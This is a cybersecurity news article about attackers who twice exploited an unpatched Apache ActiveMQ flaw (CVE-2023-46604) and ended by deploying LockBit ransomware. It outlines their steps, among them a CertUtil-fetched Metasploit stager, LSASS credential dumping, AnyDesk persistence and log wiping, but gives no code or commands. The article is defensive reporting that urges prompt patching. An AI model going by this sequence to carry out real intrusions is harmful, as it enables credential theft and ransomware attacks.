Netcrook Logo
👤 TRUSTBREAKER
🗓️ 25 Feb 2026   🗂️ Cyber Warfare    

From Forgotten Patch to Full Lockdown: How Hackers Turned an ActiveMQ Flaw into Ransomware Mayhem

Subtitle: A missed Apache ActiveMQ update set the stage for a two-stage attack, giving cybercriminals time to steal credentials, escalate privileges, and ultimately unleash LockBit ransomware across a Windows enterprise.

It started with a single, unpatched server and ended with an entire organization’s files held hostage. In a chilling demonstration of patience and precision, threat actors exploited a known Apache ActiveMQ vulnerability - CVE-2023-46604 - not once, but twice, methodically transforming a minor oversight into a full-scale ransomware crisis.

A Breach in Two Acts

The attack began in mid-February 2024, targeting an internet-facing Apache ActiveMQ server. By exploiting the Java OpenWire protocol vulnerability, the attackers remotely executed code, loading a malicious Java Spring configuration. This set off a chain reaction: CertUtil downloaded a Metasploit stager, which handed over control to the threat actors’ command-and-control servers.

Within 40 minutes, the adversaries had escalated privileges to SYSTEM, dumped credentials from LSASS memory, and begun scanning the network using SMB traffic. Armed with a domain admin account, they moved laterally, deploying Metasploit payloads and harvesting even more credentials - this time, stumbling upon a privileged service account critical for later stages.

Persistence was established by installing AnyDesk as an AutoStart service and enabling RDP through custom scripts. Event logs were wiped in an attempt to erase their tracks, but active antivirus thwarted some lateral movement attempts. Oddly, the attackers made several command syntax errors, suggesting either inexperience with Windows or a flawed attack script. After a day, they lost access - but their story was far from over.

The Return - and Ransomware

Eighteen days later, the same attackers returned, re-exploiting the same vulnerability and infrastructure. This time, using previously stolen credentials, they accessed key systems via RDP, deploying AnyDesk and network scanning tools. Then came the main act: LockBit ransomware, dropped onto backup and file servers and executed over RDP sessions for four hours. The binaries matched LockBit’s signature, but the ransom note broke from tradition - instructing victims to negotiate via a private messaging app, not official LockBit channels.

From the first breach to detonation, the attackers waited 19 days. Once they reentered, defenders had less than 90 minutes before widespread encryption began - a testament to the peril of delayed patching and the evolving tactics of ransomware gangs.

Conclusion

This incident is a stark reminder: patching is not just an IT chore, but a frontline defense. With attackers now willing to wait, learn, and strike twice, organizations must close the window of opportunity before a single missed update becomes an open invitation for disaster.

WIKICROOK

  • Apache ActiveMQ: Apache ActiveMQ is an open-source message broker that securely transmits data between applications using various messaging protocols and supports enterprise integration.
  • CVE: CVE, or Common Vulnerabilities and Exposures, is a system for uniquely identifying and tracking publicly known cybersecurity flaws in software and hardware.
  • Metasploit: Metasploit is a popular open-source toolkit that enables security experts to test and exploit vulnerabilities in computer systems for defense purposes.
  • LSASS: LSASS is a Windows process that manages security policies and credentials, making it a common target for attackers seeking to steal user information.
  • RDP (Remote Desktop Protocol): RDP is a protocol that lets users remotely access and control another computer over the internet, often used for remote support and server management.
ActiveMQ Ransomware Cybersecurity
TRUSTBREAKER TRUSTBREAKER
Zero-Trust Validation Specialist
← Back to news